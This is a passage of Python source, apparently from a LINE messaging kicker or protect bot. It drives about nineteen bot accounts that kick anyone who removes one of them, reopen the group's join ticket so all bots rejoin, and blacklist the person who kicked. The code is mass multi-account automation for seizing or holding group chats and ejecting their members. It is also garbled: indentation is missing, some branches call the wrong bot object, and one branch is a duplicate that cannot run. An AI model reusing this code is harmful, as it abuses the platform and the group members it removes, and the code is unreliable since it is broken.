ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki10mid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki7.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki11mid:
if op.param2 in ki10mid:
G = ki10.getGroup(op.param1)
G.preventJoinByTicket = False
ki10.updateGroup(G)
Ticket = ki10.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki10.updateGroup(G)
else:
G = ki10.getGroup(op.param1)
ki10.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki10.updateGroup(G)
Ticket = ki10.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki11.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki12mid:
if op.param2 in ki11mid:
G = ki11.getGroup(op.param1)
G.preventJoinByTicket = False
ki10.updateGroup(G)
Ticket = ki11.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki11.updateGroup(G)
else:
G = ki11.getGroup(op.param1)
ki10.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki11.updateGroup(G)
Ticket = ki11.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki12.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki13mid:
if op.param2 in ki12mid:
G = ki12.getGroup(op.param1)
G.preventJoinByTicket = False
ki12.updateGroup(G)
Ticket = ki12.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki12.updateGroup(G)
else:
G = ki12.getGroup(op.param1)
ki12.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki12.updateGroup(G)
Ticket = ki12.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki13.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki14mid:
if op.param2 in ki13mid:
G = ki13.getGroup(op.param1)
G.preventJoinByTicket = False
ki13.updateGroup(G)
Ticket = ki13.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki13.updateGroup(G)
else:
G = ki13.getGroup(op.param1)
ki13.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki13.updateGroup(G)
Ticket = ki13.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki14.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki15mid:
if op.param2 in ki14mid:
G = ki14.getGroup(op.param1)
G.preventJoinByTicket = False
ki14.updateGroup(G)
Ticket = ki14.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki14.updateGroup(G)
else:
G = ki14.getGroup(op.param1)
ki14.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki14.updateGroup(G)
Ticket = ki14.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki15.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki16mid:
if op.param2 in ki15mid:
G = ki15.getGroup(op.param1)
G.preventJoinByTicket = False
ki15.updateGroup(G)
Ticket = ki15.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki15.updateGroup(G)
else:
G = ki15.getGroup(op.param1)
ki15.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki15.updateGroup(G)
Ticket = ki15.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki16.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki17mid:
if op.param2 in ki16mid:
G = ki16.getGroup(op.param1)
G.preventJoinByTicket = False
ki16.updateGroup(G)
Ticket = ki16.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki16.updateGroup(G)
else:
G = ki16.getGroup(op.param1)
ki16.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki16.updateGroup(G)
Ticket = ki16.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki17.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in mid:
if op.param2 in ki18mid:
G = ki18.getGroup(op.param1)
G.preventJoinByTicket = False
ki18.updateGroup(G)
Ticket = ki18.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki18.updateGroup(G)
else:
G = ki18.getGroup(op.param1)
ki18.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki18.updateGroup(G)
Ticket = ki18.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki18.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki18mid:
if op.param2 in ki17mid:
G = ki17.getGroup(op.param1)
G.preventJoinByTicket = False
ki17.updateGroup(G)
Ticket = ki17.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki17.updateGroup(G)
else:
G = ki17.getGroup(op.param1)
ki17.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki17.updateGroup(G)
Ticket = ki17.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki18.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki18mid:
if op.param2 in ki14mid:
G = ki14.getGroup(op.param1)
G.preventJoinByTicket = False
ki14.updateGroup(G)
Ticket = ki14.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
